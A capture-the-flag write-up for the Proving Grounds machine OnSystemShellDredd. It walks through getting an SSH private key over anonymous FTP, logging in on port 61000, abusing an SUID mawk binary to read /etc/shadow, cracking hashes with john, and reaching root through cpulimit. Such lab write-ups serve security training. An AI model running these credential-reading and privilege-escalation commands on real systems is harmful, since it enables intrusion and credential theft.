Security Analyst | Security Researcher | CRTP

Proving grounds Play: OnSystemShellDredd

Proving grounds Play - OnSystemShellDredd CTF writeup.

Walkthrough on Youtube

youtube

NMAP

naveenj@hackerspace|01:02 AM|~/Pg-Play$ nmap -p- --open -sV -sT -sC 192.168.191.130 -v -oN nmap                                                                                           
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 01:02 EDT                                                
PORT      STATE SERVICE VERSION                                                              
21/tcp    open  ftp     vsftpd 3.0.3                                                         
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)                                       
| ftp-syst:                                                                                  
|   STAT:                                                                                    
| FTP server status:                                                                         
|      Connected to ::ffff:192.168.45.250                                                    
|      Logged in as ftp                                                                      
|      TYPE: ASCII                                                                           
|      No session bandwidth limit                                                            
|      Session timeout in seconds is 300                                                     
|      Control connection is plain text                                                      
|      Data connections will be plain text                                                   
|      At session startup, client count was 4                                                
|      vsFTPd 3.0.3 - secure, fast, stable                                                   
|_End of status                                                                              
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                       
| ssh-hostkey:                                                                               
|   2048 592d210c2faf9d5a7b3ea427aa378908 (RSA)                                              
|   256 5926da443b97d230b19b9b02748b8758 (ECDSA)                                             
|_  256 8ead104fe33e652840cb5bbf1d247f17 (ED25519)                                           
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel                               

FTP login

naveenj@hackerspace|01:07 AM|~$ ftp 192.168.191.130 21                                       
Connected to 192.168.191.130.                                                                
220 (vsFTPd 3.0.3)                                                                           
Name (192.168.191.130:naveenj): anonymous                                                    
331 Please specify the password.                                                             
Password:                                                                                    
230 Login successful.                                                                        
Remote system type is UNIX.                                                                  
Using binary mode to transfer files.                                                         
ftp>

List directory

ftp> ls -lsa                                                                                 
229 Entering Extended Passive Mode (|||13654|)                                               
150 Here comes the directory listing.                                                        
drwxr-xr-x    3 0        115          4096 Aug 06  2020 .                                    
drwxr-xr-x    3 0        115          4096 Aug 06  2020 ..                                   
drwxr-xr-x    2 0        0            4096 Aug 06  2020 .hannah                              
226 Directory send OK.                                                                       
ftp>

Changing directory

ftp> cd .hannah                                                                              
250 Directory successfully changed.                                                          
ftp> ls -lsa                                                                                 
229 Entering Extended Passive Mode (|||8389|)                                                
150 Here comes the directory listing.                                                        
drwxr-xr-x    2 0        0            4096 Aug 06  2020 .                                    
drwxr-xr-x    3 0        115          4096 Aug 06  2020 ..                                   
-rwxr-xr-x    1 0        0            1823 Aug 06  2020 id_rsa                               
226 Directory send OK.                                                                       
ftp>

Get id_rsa key for user hannah

ftp> get id_rsa                                                                              
local: id_rsa remote: id_rsa                                                                 
229 Entering Extended Passive Mode (|||17682|)                                               
150 Opening BINARY mode data connection for id_rsa (1823 bytes).                             
100% |************************************************|  1823       11.66 MiB/s    00:00 ETA 
226 Transfer complete.                                                                       
1823 bytes received in 00:00 (8.97 KiB/s)                                                    
ftp>

Login to hannah user using ssh

naveenj@hackerspace|01:12 AM|~/Pg-Play/OnSystemShellDredd$ ssh -i files/id_rsa hannah@192.168.191.130                                                                                     
ssh: connect to host 192.168.191.130 port 22: Connection refused

Apply required permission such as chmod 600 to the id_rsa file. Still the connection will be refused. As we have one more ssh service running on PORT 61000, we can try to connect there.

naveenj@hackerspace|01:15 AM|~/Pg-Play/OnSystemShellDredd$ ssh -i files/id_rsa hannah@192.168.191.130 -p 61000                                                                           
                                                                 
hannah@ShellDredd:~$ 

Whooo! we are logged in to hannah user now.

Obtaining Flag

hannah@ShellDredd:~$ ls
local.txt  user.txt
hannah@ShellDredd:~$ cat user.txt
Your flag is in another file...
hannah@ShellDredd:~$ cat local.txt
5b571██████████████████████████
hannah@ShellDredd:~$ 

Privilege Escalation

Get SUIDs and GUIDs

SUIDs

hannah@ShellDredd:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk #--strange binary
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/cpulimit #--strange binary
/usr/bin/mount
/usr/bin/passwd

GUIDs

hannah@ShellDredd:~$ find / -perm -g=s -type f 2>/dev/null
/usr/sbin/unix_chkpwd
/usr/bin/wall
/usr/bin/mawk
/usr/bin/ssh-agent
/usr/bin/crontab
/usr/bin/chage
/usr/bin/expiry
/usr/bin/bsd-write
/usr/bin/cpulimit
/usr/bin/dotlockfile

Search for the exploit in GFTObins for the strange binary mawk

img

The exploit worked and we are able to view the shadow file which contains hash of the users passwords.

hannah@ShellDredd:~$ mawk '//' "/etc/shadow" | grep -iE 'root|hannah'
root:$6$pUGgTFAG7pM5Sy5M$SXmRNf2GSZhId7mGCsFw█████████████████████████████████████████████████████████:18656:0:99999:7:::
hannah:$6$y8GL381zxgwD7gRr$AhERcqNym1qlATj9Rl6R██████████████████████████████████████████████████████.:18656:0:99999:7:::

Let’s start cracking the hashes using john or crackstation.

Copy both the passwd and shadow files to the local machine to unshadow.

unshadow passwd shadow > crackme run the command to unshadow the file.

Running john

naveenj@hackerspace|01:56 AM|~/Pg-Play/OnSystemShellDredd/files$ john crackme --wordlist=/usr/share/wordlists/rockyou.txt                                                                 
Using default input encoding: UTF-8                                                          
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])                                                                                       
Cost 1 (iteration count) is 5000 for all loaded hashes                                       
Will run 4 OpenMP threads                                                                    
Press 'q' or Ctrl-C to abort, almost any other key for status

After a while there is no progress, so lets check another way.

Let’s check the /usr/bin/cpulimit binary in GTFObins for exploits.

img

Running the exploit command.

img

Obtained root and proof flag.

Happy Hacking!

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.